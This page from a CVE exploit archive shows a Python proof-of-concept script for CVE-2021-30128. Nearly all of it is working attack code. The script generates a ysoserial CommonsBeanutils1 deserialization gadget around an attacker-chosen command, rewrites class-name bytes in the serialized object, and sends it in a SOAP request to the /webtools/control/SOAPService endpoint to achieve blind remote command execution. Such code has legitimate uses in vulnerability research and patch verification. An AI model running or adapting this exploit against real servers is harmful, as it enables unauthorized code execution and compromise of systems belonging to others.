4837 Total CVEs
26 Years
GitHub
Home / 2021 / CVE-2021-30128
README.md
Rendering markdown...
POC / exp.py PY
⬇ Raw GitHub ✕ Close 
import requests
import binascii
import os
import argparse

parser = argparse.ArgumentParser(description="example: python exp.py -u https://127.0.0.1:8443 -c \"calc.exe\"")
parser.add_argument("-u", "--url", help="目标url")
parser.add_argument("-c", "--command", help="执行的命令,无回显")
args = parser.parse_args()

url = args.url
command = args.command
print(command)

if url and command:
    # 生成CommonsBeanutils1的payload
    r = os.popen(
        'java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "{}" > raw_payload.obj'.format(command))
    r.close()

    # 使用SerializationDumper将payload转换为可读的形式
    r = os.popen(
        'java -jar SerializationDumper-v1.13.jar -r raw_payload.obj > raw_payload.txt')
    r.close()

    # 修改可读形式的payload
    with open('raw_payload.txt', 'rb') as f:
        payload = f.read().decode()
    payload = payload.replace("Length - 43 - 0x00 2b", "Length - 43 - 0x00 3f")
    payload = payload.replace("0x6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72",
                              "0x6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f723c6a6176612e4265616e436f6d70617261746f72")
    payload = payload.replace("Length - 63 - 0x00 3f", "Length - 63 - 0x00 59")
    payload = payload.replace("0x6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72",
                              "0x6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f723c6a6176612e436f6d70617261626c65436f6d70617261746f72")
    payload = payload.replace("Length - 58 - 0x00 3a", "Length - 58 - 0x00 4d")
    payload = payload.replace("0x636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c",
                              "0x636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c3c6a6176612e54656d706c61746573496d706c")

    # 将修改后的可读形式payload写入文件
    with open('new_payload.txt', 'wb') as f:
        f.write(payload.encode())

    # 使用SerializationDumper将修改后的可读形式payload恢复成二进制payload
    r = os.popen(
        'java -jar SerializationDumper-v1.13.jar -b new_payload.txt new_payload.obj')
    r.close()

    with open("new_payload.obj", 'rb') as f:
        payload = binascii.hexlify(f.read())

    # burp0_url = "https://127.0.0.1:8443/webtools/control/SOAPService"
    burp0_url = url + "/webtools/control/SOAPService"
    burp0_headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36",
                     "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
    burp0_data = "\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n            <soapenv:Header/>\n            <soapenv:Body>\n            <ser>\n        <map-HashMap>\n            <map-Entry>\n                <map-Key>\n                    <cus-obj>{}</cus-obj>\n                </map-Key>\n                <map-Value>\n                    <std-String value=\"http://baidu.com\"/>\n                </map-Value>\n            </map-Entry>\n        </map-HashMap>\n            </ser>\n            </soapenv:Body>\n            </soapenv:Envelope>\n            ".format(
        payload.decode())
    # print(burp0_data)
    requests.post(burp0_url, headers=burp0_headers,
                  data=burp0_data, verify=False)
else:
    parser.print_help()